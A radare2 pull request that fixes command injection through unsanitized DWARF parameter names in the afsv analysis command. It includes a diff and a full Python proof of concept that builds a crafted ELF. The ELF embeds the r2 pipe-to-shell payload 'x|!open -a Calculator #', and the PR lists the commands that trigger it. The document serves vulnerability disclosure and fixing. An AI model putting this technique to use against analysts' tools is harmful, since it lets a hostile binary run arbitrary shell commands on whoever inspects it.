### PR TITLE
Fix cmd injection via unsanitized DWARF arg name in afsv ##anal

### DIFF
--- a/libr/anal/dwarf_process.c
+++ b/libr/anal/dwarf_process.c
@@ -1588,7 +1588,8 @@ static bool import_dwarf_function_fallback(RAnal *anal, const char *typed_name, 
 	free (ret_key);
 
 	char *cc_key = r_str_newf ("func.%s.cc", typed_name);
-	sdb_set (types, cc_key, "cdecl", 0);
+	const char *default_cc = r_anal_cc_default (anal);
+	sdb_set (types, cc_key, default_cc? default_cc: "cdecl", 0);
 	free (cc_key);
 
 	RStrBuf argnames;

--- a/libr/core/cmd_anal.inc.c
+++ b/libr/core/cmd_anal.inc.c
@@ -5068,8 +5068,10 @@ static char *print_fcn_arg(RCore *core, const char *type, const char *name, cons
 	char *argstr = NULL;
 	if (addr != UT32_MAX && addr != UT64_MAX  && addr != 0) {
 		char *safe_name = r_str_sanitize_r2 (name);
-		char *res = r_core_cmd_strf (core, "pfq %s%s %s @ 0x%08" PFMT64x,
-			(on_stack == 1) ? "*" : "", fmt, safe_name, addr);
+		char *cmd = r_str_newf ("pfq %s%s %s",
+			(on_stack == 1) ? "*" : "", fmt, safe_name);
+		char *res = r_core_call_str_at (core, addr, cmd);
+		free (cmd);
 		free (safe_name);
 		r_str_trim (res);
 		if (r_str_startswith (res, "\"\\xff\\xff")) {

--- a/libr/core/cmd_anal.inc.c
+++ b/libr/core/cmd_anal.inc.c
@@ -5067,8 +5067,10 @@ static char *print_fcn_arg(RCore *core, const char *type, const char *name, cons
 	}
 	char *argstr = NULL;
 	if (addr != UT32_MAX && addr != UT64_MAX  && addr != 0) {
+		char *safe_name = r_str_sanitize_r2 (name);
 		char *res = r_core_cmd_strf (core, "pfq %s%s %s @ 0x%08" PFMT64x,
-			(on_stack == 1) ? "*" : "", fmt, name, addr);
+			(on_stack == 1) ? "*" : "", fmt, safe_name, addr);
+		free (safe_name);
 		r_str_trim (res);
 		if (r_str_startswith (res, "\"\\xff\\xff")) {
 			argstr = strdup ("\"\"");


### PR DESCRIPTION
<!--
Read https://github.com/radareorg/radare2/blob/master/DEVELOPERS.md
* PR title must be capitalized, concise and use ##tags
* If the PR is fixing a ticket use 'Fix #1234 - ..' in the commit message
* Follow the coding style, add tests and documentation if necessary
-->

- [x] Mark this if you consider it ready to merge
- [ ] I've added tests (optional)
- [ ] I wrote some lines in the [book](https://github.com/radareorg/radare2book) (optional)

**Description**

<!-- explain your changes if necessary -->

A crafted ELF binary can embed an r2 command sequence (e.g. `x|!open -a Calculator #`) as a DWARF `DW_TAG_formal_parameter` name. When radare2 analyses such a binary with `aaa`, the raw name is stored unsanitized into the type database `func.<name>.arg.N`

Running `afsvj` at the call site causes `print_fcn_arg` to construct:
```r_core_cmd_strf(core, "pfq %s%s %s @ 0x%08"PFMT64x, ..., fmt, name, addr);```

where `name` is taken directly from the type database without sanitization. because `|!` is the r2 pipe-to-shell operator, arbitrary shell commands are executed silently while the debugger inspects the binary.

### Proof of Concept

1. Build the ELF binary using the script below.
2. `r2 -qc 'aaa; s 0x4000c2; ar rdi=0x4000b0; afsvj' dwarf.elf`
```py
#!/usr/bin/env python3
import struct

INJECTION = b'x|!open -a Calculator #'

DW_TAG_compile_unit     = 0x11
DW_TAG_subprogram       = 0x2e
DW_TAG_formal_parameter = 0x05
DW_TAG_base_type        = 0x24

DW_AT_producer   = 0x25
DW_AT_language   = 0x13
DW_AT_name       = 0x03
DW_AT_low_pc     = 0x11
DW_AT_high_pc    = 0x12
DW_AT_byte_size  = 0x0b
DW_AT_encoding   = 0x3e
DW_AT_type       = 0x49
DW_AT_external   = 0x3f

DW_FORM_addr         = 0x01
DW_FORM_string       = 0x08
DW_FORM_data1        = 0x0b
DW_FORM_data2        = 0x05
DW_FORM_data8        = 0x07
DW_FORM_ref4         = 0x13
DW_FORM_flag_present = 0x19

DW_LANG_Rust       = 0x1c
DW_ATE_signed_char = 0x06

BASE     = 0x400000
EHDR_SZ  = 64
PHDR_SZ  = 56
N_PHDRS  = 2
TEXT_OFF = EHDR_SZ + N_PHDRS * PHDR_SZ

PRODUCER  = b'rustc 1.77.0'
FUNC_NAME = b'target_func'
MAIN_NAME = b'main'
ARG_TYPE  = b'char'


def uleb128(value):
    out = b''
    while True:
        byte = value & 0x7f
        value >>= 7
        out += bytes([byte | (0x80 if value else 0)])
        if not value:
            break
    return out


def cstring(s):
    return s + b'\x00'


def abbrev_entry(code, tag, has_children, attrs):
    data = uleb128(code) + uleb128(tag) + bytes([1 if has_children else 0])
    for attr, form in attrs:
        data += uleb128(attr) + uleb128(form)
    return data + b'\x00\x00'


def build_debug_abbrev():
    da  = abbrev_entry(1, DW_TAG_compile_unit, has_children=True, attrs=[
        (DW_AT_producer, DW_FORM_string),
        (DW_AT_language, DW_FORM_data2),
        (DW_AT_name,     DW_FORM_string),
        (DW_AT_low_pc,   DW_FORM_addr),
        (DW_AT_high_pc,  DW_FORM_data8),
    ])
    da += abbrev_entry(2, DW_TAG_base_type, has_children=False, attrs=[
        (DW_AT_name,      DW_FORM_string),
        (DW_AT_encoding,  DW_FORM_data1),
        (DW_AT_byte_size, DW_FORM_data1),
    ])
    da += abbrev_entry(3, DW_TAG_subprogram, has_children=True, attrs=[
        (DW_AT_name,    DW_FORM_string),
        (DW_AT_low_pc,  DW_FORM_addr),
        (DW_AT_high_pc, DW_FORM_data8),
    ])
    da += abbrev_entry(4, DW_TAG_formal_parameter, has_children=False, attrs=[
        (DW_AT_name, DW_FORM_string),
        (DW_AT_type, DW_FORM_ref4),
    ])
    da += abbrev_entry(5, DW_TAG_subprogram, has_children=False, attrs=[
        (DW_AT_name,     DW_FORM_string),
        (DW_AT_low_pc,   DW_FORM_addr),
        (DW_AT_high_pc,  DW_FORM_data8),
        (DW_AT_external, DW_FORM_flag_present),
    ])
    return da + b'\x00'


def build_debug_info(tf_va, tf_size, code_size, main_va, main_size):
    CU_HEADER_SIZE = 11

    cu_die = (
        uleb128(1)
        + cstring(PRODUCER)
        + struct.pack('<H', DW_LANG_Rust)
        + cstring(FUNC_NAME)
        + struct.pack('<Q', tf_va)
        + struct.pack('<Q', code_size)
    )
    base_type_cu_offset = CU_HEADER_SIZE + len(cu_die)

    body = cu_die
    body += uleb128(2) + cstring(ARG_TYPE) + bytes([DW_ATE_signed_char, 1])
    body += (
        uleb128(3)
        + cstring(FUNC_NAME)
        + struct.pack('<Q', tf_va)
        + struct.pack('<Q', tf_size)
    )
    body += (
        uleb128(4)
        + cstring(INJECTION)
        + struct.pack('<I', base_type_cu_offset)
    )
    body += b'\x00'
    body += (
        uleb128(5)
        + cstring(MAIN_NAME)
        + struct.pack('<Q', main_va)
        + struct.pack('<Q', main_size)
    )
    body += b'\x00'

    header = struct.pack('<IHI', len(body) + 7, 4, 0) + bytes([8])
    return header + body, base_type_cu_offset


def build_text(tf_va):
    target_func = bytes([
        0x55, 0x48, 0x89, 0xe5, 0x89, 0x7d, 0xfc, 0x5d, 0xc3,
    ])
    tf_size = len(target_func)

    main_body = bytearray([
        0x55, 0x48, 0x89, 0xe5,
        0xbf, 0x2a, 0x00, 0x00, 0x00,
        0xe8, 0x00, 0x00, 0x00, 0x00,
        0x31, 0xc0, 0x5d, 0xc3,
    ])
    call_src_va = tf_va + tf_size + 9
    struct.pack_into('<i', main_body, 10, tf_va - call_src_va - 5)

    return target_func + bytes(main_body), tf_size, len(main_body)


def elf_header(entry_va, shoff, n_shdrs, shstrndx):
    return (
        b'\x7fELF' + bytes([2, 1, 1]) + b'\x00' * 9
        + struct.pack('<HHIQQQIHHHHHH',
            2, 62, 1, entry_va, EHDR_SZ, shoff, 0,
            EHDR_SZ, PHDR_SZ, N_PHDRS, 64, n_shdrs, shstrndx,
        )
    )


def phdr(flags, file_off, vaddr, file_sz, align):
    return struct.pack('<IIQQQQQQ',
        1, flags, file_off, vaddr, vaddr, file_sz, file_sz, align)


def shdr(name_off, sh_type, flags, vaddr, offset, size):
    return struct.pack('<IIQQQQIIQQ',
        name_off, sh_type, flags, vaddr, offset, size, 0, 0, 1, 0)


def build_elf():
    tf_va = BASE + TEXT_OFF
    code, tf_size, main_size = build_text(tf_va)
    main_va = tf_va + tf_size

    debug_abbrev = build_debug_abbrev()
    debug_info, base_type_cu_off = build_debug_info(
        tf_va, tf_size, len(code), main_va, main_size
    )

    sections = [
        (b'.text',         code,         0x06, 16),
        (b'.debug_abbrev', debug_abbrev, 0,    1),
        (b'.debug_info',   debug_info,   0,    1),
    ]

    shstrtab = b'\x00'
    name_offsets = []
    for name, _, _, _ in sections:
        name_offsets.append(len(shstrtab))
        shstrtab += name + b'\x00'
    shstrtab_name_off = len(shstrtab)
    shstrtab += b'.shstrtab\x00'

    sec_offsets = []
    offset = TEXT_OFF
    for i, (_, data, _, align) in enumerate(sections):
        if i and align > 1:
            offset += (-offset) % align
        sec_offsets.append(offset)
        offset += len(data)

    shstrtab_off = offset
    offset += len(shstrtab)
    offset += (-offset) % 8
    shoff = offset

    ph_text = phdr(0x5, sec_offsets[0], BASE + sec_offsets[0], len(code), 0x200000)
    dbg_start = sec_offsets[1]
    dbg_end   = sec_offsets[-1] + len(sections[-1][1])
    ph_dbg    = phdr(0x4, dbg_start, 0, dbg_end - dbg_start, 0x1000)

    n_shdrs  = len(sections) + 2
    shstrndx = len(sections) + 1
    shdrs = shdr(0, 0, 0, 0, 0, 0)
    for i, (_, data, flags, _) in enumerate(sections):
        va = (BASE + sec_offsets[i]) if (flags & 2) else 0
        shdrs += shdr(name_offsets[i], 1, flags, va, sec_offsets[i], len(data))
    shdrs += shdr(shstrtab_name_off, 3, 0, 0, shstrtab_off, len(shstrtab))

    ehdr = elf_header(main_va, shoff, n_shdrs, shstrndx)

    elf = bytearray(ehdr + ph_text + ph_dbg)
    for i, (_, data, _, _) in enumerate(sections):
        while len(elf) < sec_offsets[i]:
            elf += b'\x00'
        elf += data
    while len(elf) < shstrtab_off:
        elf += b'\x00'
    elf += shstrtab
    while len(elf) % 8:
        elf += b'\x00'
    elf += shdrs

    return bytes(elf), tf_va, main_va, tf_size, base_type_cu_off


if __name__ == '__main__':
    elf, tf_va, main_va, tf_size, base_type_cu_off = build_elf()
    call_va = main_va + 9

    assert INJECTION in elf

    out = '/tmp/dwarf.elf'
    with open(out, 'wb') as f:
        f.write(elf)

    print(f'Written {out} ({len(elf)} bytes)')
    print(f'  target_func  @ 0x{tf_va:x}')
    print(f'  main         @ 0x{main_va:x}')
    print(f'  call insn    @ 0x{call_va:x}')
    print(f'  payload      = {INJECTION.decode()!r}')
    print()
    print('Trigger:')
    print(f'  r2 {out}')
    print(f'  [0x{main_va:x}]> aaa')
    print(f'  [0x{main_va:x}]> s 0x{call_va:x}')
    print(f'  [0x{call_va:x}]> ar rdi=0x{tf_va:x}')
    print(f'  [0x{call_va:x}]> afsvj')
```